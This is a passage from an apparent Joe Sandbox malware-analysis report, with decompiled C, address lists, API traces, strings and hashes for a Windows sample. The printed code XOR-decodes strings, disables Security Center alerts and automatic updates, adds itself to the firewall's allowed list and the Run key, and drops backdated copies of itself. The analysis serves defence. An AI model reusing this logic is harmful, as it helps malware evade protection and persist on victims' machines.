														 *_t312 =  *_t312 ^ 0x000000d4;
														_t312 =  &(_t312[1]);
													}
													_t313 = "FirewallDisableNotify";
													while(1) {
														__eflags = _t313 - 0x40715f;
														if(_t313 >= 0x40715f) {
															break;
														}
														 *_t313 =  *_t313 ^ 0x000000d4;
														_t313 =  &(_t313[1]);
													}
													_t314 = "UpdatesDisableNotify";
													while(1) {
														__eflags = _t314 - 0x407149;
														if(_t314 >= 0x407149) {
															break;
														}
														 *_t314 =  *_t314 ^ 0x000000d4;
														_t314 =  &(_t314[1]);
													}
													_t315 = RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Security Center", 0, 0x20006, _t433); // executed
													__eflags = _t315;
													if(_t315 == 0) {
														_t396 =  &_a108;
														RegSetValueExA(_a104, "AntiVirusOverride", 0, 4, _t396, 4); // executed
														RegSetValueExA(_a104, "AntiVirusDisableNotify", 0, 4, _t396, 4); // executed
														RegSetValueExA(_a104, "FirewallDisableNotify", 0, 4, _t396, 4); // executed
														RegSetValueExA(_a104, "UpdatesDisableNotify", 0, 4, _t396, 4); // executed
														RegCloseKey(_a104); // executed
													}
													_t316 = "SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List";
													while(1) {
														__eflags = _t316 - 0x407134;
														if(_t316 >= 0x407134) {
															break;
														}
														 *_t316 =  *_t316 ^ 0x000000d4;
														_t316 =  &(_t316[1]);
													}
													_t317 = RegOpenKeyExA(0x80000002, "SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List", 0, 0x2001f, _t433); // executed
													__eflags = _t317;
													if(_t317 != 0) {
														goto L80;
													}
													_t319 = E00401000(0x8000);
													_a68 = 0x4000;
													_t434 = _t319;
													_t320 = 0x407080;
													_a108.dwLowDateTime = 0x4000;
													while(1) {
														__eflags = _t320 - 0x4070a4;
														if(_t320 >= 0x4070a4) {
															break;
														}
														 *_t320 =  *_t320 ^ 0x000000d4;
														_t320 =  &(_t320[1]);
													}
													_a4 = 0;
													while(1) {
														_t69 =  &(_t434[0x4000]); // 0x4000
														_t394 = _t69;
														_t324 = RegEnumValueA(_a104, _a4, _t434,  &_a108, 0,  &_a64, _t69,  &_a68);
														__eflags = _t324;
														if(_t324 != 0) {
															break;
														}
														__eflags = _a64 - 1;
														if(_a64 == 1) {
															_t326 = E00401311(_t394, 0x40708d);
															__eflags = _t326;
															if(_t326 != 0) {
																RegDeleteValueA(_a104, _t434);
															}
														}
														_t64 =  &_a4;
														 *_t64 = _a4 + 1;
														__eflags =  *_t64;
														_a68 = 0x4000;
														_a108.dwLowDateTime = 0x4000;
													}
													_t395 =  &_a5432;
													_t329 = wsprintfA(_t434, 0x407080, _t395) + 1;
													__eflags = _t329;
													_t439 =  &(_t439[3]);
													RegSetValueExA(_a112, _t395, 0, 1, _t434, _t329);
													E00401029(_t434);
													RegCloseKey(_a112);
													goto L80;
												}
												_t347 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0x20006,  &_a104);
												__eflags = _t347;
												if(_t347 != 0) {
													goto L40;
												}
												goto L37;
											}
											__eflags = _t192 - 0xffffffff;
											if(_t192 == 0xffffffff) {
												goto L29;
											}
											L28:
											WriteFile(_t403, 0x408840, 0x5e00,  &_a116, 0); // executed
											CloseHandle(_a120); // executed
											goto L30;
										}
										__eflags = _t189 - 0xffffffff;
										if(_t189 != 0xffffffff) {
											goto L28;
										}
										goto L26;
									}
								}
								__eflags = _t355 + 1;
								if(_t355 + 1 != 0) {
									L9:
									WriteFile(_a128, 0x40e640, 0x1400,  &_a124, 0); // executed
									__eflags = _v20;
									if(_v20 != 0) {
										SetFileTime(_a128,  &_a92,  &_a100,  &_a108); // executed
									}
									CloseHandle(_a128); // executed
									_a4 = 1;
									_push(0);
									_push("winlogon.exe");
									_t398 =  &_a3576;
									_t361 = E0040318D(_t398);
									_t439 =  &(_t439[3]);
									__eflags = _t361;
									if(_t361 == 0) {
										_push(0);
										_push("explorer.exe");
										E0040318D(_t398);
										_t439 =  &(_t439[3]);
									}
									_push(0);
									_push("kernel32.dll");
									_push(_t398);
									L23:
									E0040318D();
									_t439 =  &(_t439[3]);
									CreateFileA( &_a3584, 0x80000000, 1, 0, 3, 0, 0); // executed
									goto L24;
								}
								goto L21;
							}
							__eflags = _t181 + 1;
							if(_t181 + 1 != 0) {
								goto L9;
							}
							goto L18;
						}
						L15:
						_a12 = 1;
						_push(0);
						_push("kernel32.dll");
						_push( &_a3584);
						goto L23;
					}
					__eflags = _t177 + 1;
					if(_t177 + 1 == 0) {
						goto L14;
					}
					goto L9;
				}
				_t435 =  &_a1450;
				if(GetTempFileNameA(_t379, ?str?, 0, _t435) == 0) {
					goto L7;
				}
				_t370 = CreateFileA(_t435, 0x40000000, 0, 0, 2, 0x80, 0);
				_a160 = _t370;
				if(_t370 != 0 && _t370 + 1 != 0) {
					WriteFile(_a160, _a20, _t437,  &_a156, 0); // executed
					CloseHandle(_a160);
					CreateFileA( &_a1450, 0x80000000, 1, 0, 3, 0, 0); // executed
					_t436 =  &_a1977;
					_t427 =  &_a1417;
					_t402 =  &_a2530;
					L5:
					if(_t436 < _t402) {
						_t378 = _a1976 & 0x000000ff ^  *_t427;
						_t427 =  &(_t427[0]);
						 *_t436 = _t378;
						_t436 =  &(_t436[1]);
						goto L5;
					}
				}
			}

0x00404dc1
0x00404e76
0x00404e7a
0x00404e84
0x00404e8c
0x00404e91
0x00404e96
0x00404e9c
0x00404ea1
0x00404ea2
0x00404ea8
0x00404eae
0x00404ec6
0x00404ecb
0x00404ed2
0x00404ed4
0x00404f78
0x00404f78
0x00404f7d
0x00404f80
0x00404fa3
0x00404fb0
0x00404fb5
0x00404fba
0x00404fc1
0x00404fc7
0x00404fdf
0x00404fe4
0x00404feb
0x00404fed
0x00404ff6
0x00404ff6
0x00404ffb
0x00404ffe
0x00000000
0x00000000
0x00405006
0x0040500b
0x00405010
0x00405017
0x0040501d
0x00405035
0x0040503a
0x00405041
0x00405043
0x0040504c
0x0040504c
0x00405051
0x00405054
0x00000000
0x0040505a
0x00405080
0x00405085
0x00405092
0x00405097
0x0040509c
0x004050a3
0x004050a9
0x004050c1
0x004050c6
0x004050cd
0x004050cf
0x004050d1
0x004050d8
0x004050d8
0x004050e5
0x004050ea
0x004050ef
0x004050f6
0x004050fc
0x00405114
0x00405119
0x00405120
0x00405122
0x00405124
0x00405153
0x00405153
0x0040515b
0x0040515b
0x00405163
0x0040517c
0x0040517c
0x00405186
0x0040518e
0x00405193
0x00405198
0x00405199
0x004051a0
0x004051b0
0x004051b7
0x004051c7
0x004051ce
0x004051d3
0x004051d8
0x004051d8
0x004051dd
0x004051df
0x004051e2
0x00000000
0x004051e2
0x004051fe
0x00405203
0x00405205
0x00405229
0x00405229
0x0040522e
0x00405237
0x0040523e
0x00405243
0x00405244
0x00405249
0x00405249
0x0040525d
0x0040525d
0x0040526e
0x0040527a
0x0040527f
0x0040527f
0x00405286
0x004054f1
0x00405509
0x0040550f
0x00405514
0x00405519
0x00405519
0x0040551e
0x00000000
0x00000000
0x00405520
0x00405523
0x00405523
0x00405526
0x0040552e
0x00405538
0x0040553d
0x00405542
0x00000000
0x00000000
0x00405548
0x00405550
0x00405558
0x0040555d
0x0040555f
0x004057d5
0x004057d5
0x004057f2
0x004057f2
0x004057fa
0x004057fa
0x00405802
0x00405804
0x00405806
0x0040580b
0x00405810
0x00405815
0x0040581a
0x0040581f
0x0040582c
0x00405831
0x00405831
0x00405834
0x00405839
0x00405841
0x00405849
0x00405863
0x00405868
0x0040586a
0x00405873
0x00405878
0x0040589d
0x004058a2
0x004058a3
0x004058a8
0x004058a8
0x004058bb
0x004058c7
0x004058c7
0x0040586a
0x004058cc
0x004058d1
0x004058d8
0x00405933
0x00405938
0x0040593a
0x00405957
0x00405957
0x0040595e
0x0040595f
0x00405964
0x00405964
0x00405965
0x00405966
0x00405967
0x00405969
0x0040596b
0x00000000
0x0040596b
0x0040594e
0x00405953
0x00405955
0x00000000
0x00000000
0x00000000
0x004058da
0x004058dc
0x004058e4
0x004058f4
0x004058f9
0x004058fb
0x00405989
0x00405989
0x0040598e
0x00000000
0x00000000
0x00405996
0x004059b8
0x004059bd
0x004059bf
0x004059e7
0x00405a04
0x00405a10
0x00405a15
0x00405a17
0x00405a1f
0x00405a24
0x00405a2b
0x00405a32
0x00405a9f
0x00405aa4
0x00405aa6
0x00000000
0x00000000
0x00405aa8
0x00405aa9
0x00405abe
0x00405ada
0x00405ae6
0x00405af6
0x00405afb
0x00405afd
0x00000000
0x00000000
0x00405aff
0x00405b06
0x00000000
0x00405b06
0x00405a3f
0x00405a44
0x00405a46
0x00000000
0x00000000
0x00405a53
0x00405a58
0x00405a59
0x00405a71
0x00405a8d
0x00000000
0x00405a8d
0x004059de
0x004059e3
0x004059e5
0x00000000
0x00000000
0x00000000
0x004059e5
0x00405908
0x0040590d
0x0040590e
0x00405914
0x00405915
0x00405916
0x00405918
0x0040591a
0x00405971
0x00405978
0x00405984
0x00000000
0x00405984
0x00405b0b
0x00405b15
0x00405b1f
0x00405b24
0x00405b24
0x00405b24
0x00405b24
0x00405b4c
0x00405b51
0x00405b53
0x00405b59
0x00405b66
0x00405b78
0x00405b7d
0x00405b7f
0x00405b85
0x00405b86
0x00405b88
0x00405b8c
0x00405bae
0x00405bb8
0x00405bbd
0x00405bc4
0x00405be5
0x00405bc6
0x00405bd1
0x00405bd9
0x00405bd9
0x00405b8e
0x00405b9e
0x00405b9e
0x00405b8c
0x00405bee
0x00405bee
0x00000000
0x00405b53
0x00405583
0x00405588
0x0040558a
0x004057de
0x004057e2
0x00000000
0x00000000
0x004057e4
0x004057e4
0x00000000
0x004057e4
0x00405590
0x00405595
0x0040559a
0x004055a7
0x004055bf
0x004055c4
0x004055c6
0x004055dc
0x004055e8
0x004055ed
0x00405669
0x00405669
0x00405670
0x004056a9
0x004056a9
0x004056cf
0x004056d1
0x004056e7
0x004056e7
0x004056ec
0x004056ee
0x004057cc
0x004057d0
0x00000000
0x004057d0
0x004056f4
0x004056fd
0x004056ff
0x00405705
0x00405708
0x0040572b
0x0040572b
0x00405738
0x00405750
0x00405755
0x00405757
0x00405761
0x00405761
0x00405766
0x00405769
0x0040576d
0x0040576d
0x0040577c
0x00405781
0x00000000
0x00405783
0x00405783
0x00405788
0x0040578a
0x00000000
0x00000000
0x0040578c
0x00405795
0x00405797
0x0040579d
0x004057a0
0x00000000
0x00000000
0x004057a2
0x004057a4
0x004057a5
0x004057a7
0x004057a9
0x004057ae
0x004057b5
0x004057be
0x004057c3
0x00000000
0x004057c3
0x00405781
0x00405712
0x00405716
0x0040571a
0x0040571c
0x0040571d
0x0040571f
0x00405721
0x00000000
0x00405721
0x004056e0
0x004056e5
0x00000000
0x00000000
0x00000000
0x004056e5
0x00405672
0x0040567b
0x0040567d
0x00405683
0x00405686
0x00000000
0x00000000
0x00405690
0x00405694
0x00405698
0x0040569a
0x0040569b
0x0040569d
0x0040569f
0x00000000
0x0040569f
0x004055ef
0x004055f4
0x004055f6
0x00000000
0x00000000
0x00405605
0x0040560b
0x0040560d
0x0040560f
0x00405611
0x00405619
0x0040561f
0x00405622
0x00405624
0x00405624
0x00405622
0x0040562a
0x0040562f
0x00405631
0x0040565f
0x00405633
0x0040563b
0x00405640
0x00405642
0x00405647
0x0040564d
0x0040564f
0x00405654
0x00405656
0x00405656
0x00405654
0x00405658
0x00405658
0x00000000
0x00405631
0x004055cc
0x004055d1
0x004055d6
0x00000000
0x00000000
0x00000000
0x004057ee
0x004057ee
0x004057ee
0x004057ee
0x00000000
0x004057ee
0x0040552e
0x0040528c
0x00405291
0x00405291
0x00405296
0x00000000
0x00000000
0x00405298
0x0040529b
0x0040529b
0x0040529e
0x004052a3
0x004052a3
0x004052a8
0x00000000
0x00000000
0x004052aa
0x004052ad
0x004052ad
0x004052b0
0x004052c2
0x004052c7
0x004052c9
0x004052e5
0x004052f1
0x004052f1
0x004052f6
0x004052fb
0x004052fb
0x00405300
0x00000000
0x00000000
0x00405302
0x00405305
0x00405305
0x00405308
0x0040530d
0x0040530d
0x00405312
0x00000000
0x00000000
0x00405314
0x00405317
0x00405317
0x0040531a
0x0040531f
0x0040531f
0x00405324
0x00000000
0x00000000
0x00405326
0x00405329
0x00405329
0x0040532c
0x00405331
0x00405331
0x00405336
0x00000000
0x00000000
0x00405338
0x0040533b
0x0040533b
0x0040533e
0x00405343
0x00405343
0x00405348
0x00000000
0x00000000
0x0040534a
0x0040534d
0x0040534d
0x00405362
0x00405367
0x00405369
0x0040536d
0x00405385
0x0040539d
0x004053b5
0x004053cd
0x004053d9
0x004053d9
0x004053de
0x004053e3
0x004053e3
0x004053e8
0x00000000
0x00000000
0x004053ea
0x004053ed
0x004053ed
0x00405402
0x00405407
0x00405409
0x00000000
0x00000000
0x00405413
0x00405418
0x00405420
0x00405422
0x00405427
0x00405432
0x00405432
0x00405437
0x00000000
0x00000000
0x00405439
0x0040543c
0x0040543c
0x0040543f
0x00405484
0x00405488
0x00405488
0x004054ab
0x004054b0
0x004054b2
0x00000000
0x00000000
0x00405449
0x0040544e
0x00405457
0x0040545c
0x0040545e
0x00405468
0x00405468
0x0040545e
0x0040546d
0x0040546d
0x0040546d
0x00405471
0x00405479
0x00405479
0x004054b4
0x004054c7
0x004054c7
0x004054c8
0x004054d9
0x004054e0
0x004054ec
0x00000000
0x004054ec
0x00405220
0x00405225
0x00405227
0x00000000
0x00000000
0x00000000
0x00405227
0x00405126
0x00405129
0x00000000
0x00000000
0x0040512b
0x00405140
0x0040514c
0x00000000
0x0040514c
0x004050d3
0x004050d6
0x00000000
0x00000000
0x00000000
0x004050d6
0x00405054
0x00405045
0x00405046
0x00404ee1
0x00404efc
0x00404f01
0x00404f06
0x00404f27
0x00404f27
0x00404f33
0x00404f38
0x00404f40
0x00404f42
0x00404f47
0x00404f4f
0x00404f54
0x00404f57
0x00404f59
0x00404f5b
0x00404f5d
0x00404f63
0x00404f68
0x00404f68
0x00404f6b
0x00404f6d
0x00404f72
0x0040505c
0x0040505c
0x00405061
0x0040507b
0x00000000
0x0040507b
0x00000000
0x00405046
0x00404fef
0x00404ff0
0x00000000
0x00000000
0x00000000
0x00404ff0
0x00404f82
0x00404f82
0x00404f8a
0x00404f8c
0x00404f98
0x00000000
0x00404f98
0x00404eda
0x00404edb
0x00000000
0x00000000
0x00000000
0x00404edb
0x00404dc7
0x00404dde
0x00000000
0x00000000
0x00404df7
0x00404dfc
0x00404e05
0x00404e20
0x00404e2c
0x00404e48
0x00404e4d
0x00404e54
0x00404e5b
0x00404e62
0x00404e64
0x00404e6e
0x00404e70
0x00404e71
0x00404e73
0x00000000
0x00404e73
0x00404e64

APIs

GetTempPathA.KERNEL32(00000104), ref: 00404DBA
GetTempFileNameA.KERNEL32(?,tmp,00000000,?,00000104), ref: 00404DD7
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,tmp,00000000,?,00000104), ref: 00404DF7
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00404E20
CloseHandle.KERNEL32(?,?,?,?,?,00000000), ref: 00404E2C
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,00000000), ref: 00404E48
GetSystemDirectoryA.KERNEL32 ref: 00404E8C
lstrcat.KERNEL32(?,0041103E), ref: 00404EA2
lstrcat.KERNEL32(00000000,?), ref: 00404EA8
SetFileAttributesA.KERNEL32(00000000,00000000,?,0041103E,00000080,?,00000104,?,00000000,?,?,00000000,00000000,00000000,?,80000000), ref: 00404EAE
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,0041103E,00000080,?,00000104,?,00000000), ref: 00404EC6
WriteFile.KERNEL32(?,0040E640,00001400,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,?,00000080,00000104), ref: 00404EFC
SetFileTime.KERNEL32(?,?,?,?,?,0040E640,00001400,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00404F27
CloseHandle.KERNEL32(?,?,0040E640,00001400,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,?,00000080), ref: 00404F33
GetLastError.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,0041103E,00000080,?,00000104,?,00000000), ref: 00404F78
ExpandEnvironmentStringsA.KERNEL32(%AppData%\,?,00000104,?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,0041103E,00000080,?), ref: 00404FB0
lstrcat.KERNEL32(?,00000080), ref: 00404FC1
SetFileAttributesA.KERNEL32(00000000,?,00000080,%AppData%\,?,00000104,?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?), ref: 00404FC7
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,?,00000080,%AppData%\,?,00000104,?,40000000,00000000), ref: 00404FDF
GetLastError.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,?,00000080,%AppData%\,?,00000104,?,40000000,00000000), ref: 00404FF6
GetTempPathA.KERNEL32(00000104,?,?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,?,00000080,%AppData%\,?,00000104,?), ref: 00405006
lstrcat.KERNEL32(?,00000080), ref: 00405017
SetFileAttributesA.KERNEL32(00000000,?,00000080,00000104,?,?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,?,00000080,%AppData%\), ref: 0040501D
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,?,00000080,00000104,?,?,40000000,00000000,00000000), ref: 00405035
GetLastError.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,?,00000080,00000104,?,?,40000000,00000000,00000000), ref: 0040504C
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040507B
ExpandEnvironmentStringsA.KERNEL32(%AppData%\,?,00000104,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00405092
lstrcat.KERNEL32(?,00000080), ref: 004050A3
SetFileAttributesA.KERNEL32(00000000,?,00000080,%AppData%\,?,00000104,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004050A9
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,?,00000080,%AppData%\,?,00000104,?,80000000,00000001), ref: 004050C1
GetTempPathA.KERNEL32(00000104,?,?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,?,00000080,%AppData%\,?,00000104,?), ref: 004050E5
lstrcat.KERNEL32(?,00000080), ref: 004050F6
SetFileAttributesA.KERNEL32(00000000,?,00000080,00000104,?,?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,?,00000080,%AppData%\), ref: 004050FC
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,?,00000080,00000104,?,?,40000000,00000000,00000000), ref: 00405114
WriteFile.KERNEL32(00000000,00408840,00005E00,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,?,00000080,00000104), ref: 00405140
CloseHandle.KERNEL32(?,00000000,00408840,00005E00,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,?,00000080), ref: 0040514C
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040517C
GetSystemDirectoryA.KERNEL32 ref: 0040518E
lstrcat.KERNEL32(?,0041103E), ref: 00405199
ExpandEnvironmentStringsA.KERNEL32(%CommonProgramFiles%\System\,?,00000104,?,0041103E,?,00000104), ref: 004051B0
ExpandEnvironmentStringsA.KERNEL32(%AppData%\,?,00000104,%CommonProgramFiles%\System\,?,00000104,?,0041103E,?,00000104), ref: 004051C7
RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Run,00000000,00020006,?,%AppData%\,?,00000104,%CommonProgramFiles%\System\,?,00000104,?,0041103E,?,00000104), ref: 004051FE
RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,00020006,?,80000002,Software\Microsoft\Windows\CurrentVersion\Run,00000000,00020006,?,%AppData%\,?,00000104,%CommonProgramFiles%\System\,?,00000104), ref: 00405220
lstrlen.KERNEL32(?,80000002,Software\Microsoft\Windows\CurrentVersion\Run,00000000,00020006,?,%AppData%\,?,00000104,%CommonProgramFiles%\System\,?,00000104,?,0041103E,?,00000104), ref: 00405244
RegSetValueExA.ADVAPI32(?,00000000,00000001,?,00000001,?,80000002,Software\Microsoft\Windows\CurrentVersion\Run,00000000,00020006,?,%AppData%\,?,00000104,%CommonProgramFiles%\System\,?), ref: 0040525D
RegDeleteValueA.ADVAPI32(?,winrnt.exe,80000002,Software\Microsoft\Windows\CurrentVersion\Run,00000000,00020006,?,%AppData%\,?,00000104,%CommonProgramFiles%\System\,?,00000104,?,0041103E,?), ref: 0040526E
RegCloseKey.ADVAPI32(?,?,winrnt.exe,80000002,Software\Microsoft\Windows\CurrentVersion\Run,00000000,00020006,?,%AppData%\,?,00000104,%CommonProgramFiles%\System\,?,00000104,?,0041103E), ref: 0040527A
RegCreateKeyA.ADVAPI32(80000002,SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU,?), ref: 004052C2
RegSetValueExA.ADVAPI32(?,NoAutoUpdate,00000000,00000004,?,00000004,80000002,SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU,?,?,?,winrnt.exe,80000002,Software\Microsoft\Windows\CurrentVersion\Run,00000000,00020006), ref: 004052E5
RegCloseKey.ADVAPI32(?,?,NoAutoUpdate,00000000,00000004,?,00000004,80000002,SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU,?,?,?,winrnt.exe,80000002,Software\Microsoft\Windows\CurrentVersion\Run,00000000), ref: 004052F1
RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Security Center,00000000,00020006,?,80000002,SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU,?,?,?,winrnt.exe,80000002,Software\Microsoft\Windows\CurrentVersion\Run,00000000,00020006,?), ref: 00405362
RegSetValueExA.ADVAPI32(?,AntiVirusOverride,00000000,00000004,?,00000004,80000002,SOFTWARE\Microsoft\Security Center,00000000,00020006,?,80000002,SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU,?,?,?), ref: 00405385
RegSetValueExA.ADVAPI32(?,AntiVirusDisableNotify,00000000,00000004,?,00000004,?,AntiVirusOverride,00000000,00000004,?,00000004,80000002,SOFTWARE\Microsoft\Security Center,00000000,00020006), ref: 0040539D
RegSetValueExA.ADVAPI32(?,FirewallDisableNotify,00000000,00000004,?,00000004,?,AntiVirusDisableNotify,00000000,00000004,?,00000004,?,AntiVirusOverride,00000000,00000004), ref: 004053B5
RegSetValueExA.ADVAPI32(?,UpdatesDisableNotify,00000000,00000004,?,00000004,?,FirewallDisableNotify,00000000,00000004,?,00000004,?,AntiVirusDisableNotify,00000000,00000004), ref: 004053CD
RegCloseKey.ADVAPI32(?,?,UpdatesDisableNotify,00000000,00000004,?,00000004,?,FirewallDisableNotify,00000000,00000004,?,00000004,?,AntiVirusDisableNotify,00000000), ref: 004053D9
RegOpenKeyExA.ADVAPI32(80000002,SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List,00000000,0002001F,?,80000002,SOFTWARE\Microsoft\Security Center,00000000,00020006,?,80000002,SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU,?,?,?,winrnt.exe), ref: 00405402
RegEnumValueA.ADVAPI32(?,40000000,00000000,?,00000000,00000000,00004000,00004000,80000002,SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List,00000000,0002001F,?,80000002,SOFTWARE\Microsoft\Security Center,00000000), ref: 004054AB
wsprintfA.USER32 ref: 004054C2
RegSetValueExA.ADVAPI32(?,?,00000000,00000001,00000000,00000001,00000003,00000000,00000000), ref: 004054D9
RegCloseKey.ADVAPI32(?,?,?,00000000,00000001,00000000,00000001,00000003,00000000,00000000), ref: 004054EC
CreateThread.KERNEL32 ref: 00405509
CloseHandle.KERNEL32(00000000,00000000,00010000,Function_0000265F,00000002,00000000,?,?,?,winrnt.exe,80000002,Software\Microsoft\Windows\CurrentVersion\Run,00000000,00020006,?,%AppData%\), ref: 0040550F
RegCreateKeyExA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,00000000,00000000,0002001F,00000000,00000002,00000000,00000000,00000000,00010000,Function_0000265F,00000002,00000000,?), ref: 00405583
GetSystemTimeAsFileTime.KERNEL32(00000000,80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,00000000,00000000,0002001F,00000000,00000002,00000000,00000000,00000000,00010000,Function_0000265F,00000002,00000000), ref: 00405595
RegQueryValueExA.ADVAPI32(?,ConnPred,00000000,00000000,00000000,00000008,00000000,80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,00000000,00000000,0002001F,00000000,00000002,00000000), ref: 004055BF

Strings

kernel32.dll, xrefs: 00404F6D
tmp, xrefs: 00404DD1
explorer.exe, xrefs: 00404F5D
winlogon.exe, xrefs: 00404F42
Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 004051D3
%CommonProgramFiles%\System\, xrefs: 004051AB
%AppData%\, xrefs: 0040508D, 004051C2

Memory Dump Source

Source File: 00000001.00000002.580833251.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.580816156.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580871014.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580943075.0000000000411000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580963018.0000000000412000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580985583.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581001103.0000000000416000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581020455.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_olfopeh-outix.jbxd

Similarity

API ID: File$Create$Value$Close$lstrcat$Attributes$EnvironmentExpandHandleOpenStringsTemp$ErrorLastPathSystemTimeWrite$Directory$DeleteEnumNameQueryThreadlstrlenwsprintf
String ID: %AppData%\$%CommonProgramFiles%\System\$Software\Microsoft\Windows\CurrentVersion\Run$explorer.exe$kernel32.dll$tmp$winlogon.exe
API String ID: 673231081-2236961291
Opcode ID: d5bd3d752869f85ed849420131d9c06b7754e5e7b6522597e6f00d0aa0f3a70e
Instruction ID: fbe2660df193cff3e18baa874fd9eb54c314e199f9e988dc3fb1dd516a992f0b
Opcode Fuzzy Hash: d5bd3d752869f85ed849420131d9c06b7754e5e7b6522597e6f00d0aa0f3a70e
Instruction Fuzzy Hash: 6B7193B0784745B9E630A6618C4BFDB228DAF44B48F50493F73C5B90C2DAFCA5448B6E

Uniqueness

Uniqueness Score: -1.00%

Function 0040457B Relevance: 61.5, APIs: 27, Strings: 8, Instructions: 233
stringregistryfileCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E0040457B() {
				long _t328;
				int _t330;
				signed char* _t349;
				int _t352;
				void* _t354;
				int _t355;
				int _t356;
				void* _t360;
				int _t361;
				int _t362;
				CHAR* _t365;
				int _t367;
				long _t368;
				CHAR* _t369;
				int _t371;
				long _t372;
				CHAR* _t377;
				void* _t379;
				CHAR* _t380;
				void* _t382;
				signed char* _t392;
				int _t393;
				void* _t396;
				signed char* _t398;
				int _t401;
				int _t402;
				int _t408;
				int _t409;
				int _t414;
				int _t419;
				int _t421;
				void* _t423;
				int _t427;
				void* _t429;
				int _t434;
				long _t438;
				int _t439;
				int _t445;
				int _t447;
				int _t450;
				int _t457;
				int _t459;
				int _t461;
				int _t466;
				int _t469;
				int _t471;
				int _t474;
				int _t476;
				void* _t480;
				int _t485;
				int _t487;
				int _t489;
				int _t493;
				void* _t494;
				void* _t496;
				signed char* _t497;
				signed char* _t498;
				int _t499;
				signed char* _t500;
				signed char* _t501;
				signed char* _t502;
				signed char* _t503;
				signed char* _t504;
				int _t505;
				signed char* _t506;
				int _t507;
				char* _t509;
				CHAR* _t510;
				int _t514;
				int _t516;
				int _t519;
				void* _t533;
				int _t534;
				int _t537;
				CHAR* _t543;
				int _t545;
				long _t546;
				int _t551;
				int _t559;
				int _t560;
				signed char _t568;
				int _t574;
				int _t578;
				void* _t580;
				int _t581;
				void* _t584;
				signed char _t595;
				int _t596;
				signed char* _t597;
				void* _t598;
				void* _t600;
				int _t605;
				void* _t607;
				void* _t608;
				int* _t609;
				signed int* _t612;
				long _t622;
				int _t623;
				signed char _t633;
				void* _t636;
				int _t637;
				signed char* _t638;
				void* _t639;
				void* _t641;
				int _t644;
				void* _t646;
				void* _t647;
				void* _t648;
				signed int* _t651;
				void* _t660;
				int _t661;
				signed char _t671;
				CHAR* _t674;
				char* _t675;
				CHAR* _t676;
				CHAR* _t677;
				CHAR* _t678;
				CHAR* _t679;
				CHAR* _t680;
				CHAR* _t681;
				CHAR* _t682;
				int* _t683;
				void** _t684;
				char* _t685;
				char* _t686;
				CHAR* _t687;
				int _t690;
				char* _t691;
				char* _t693;
				char* _t694;
				char* _t695;
				int* _t696;
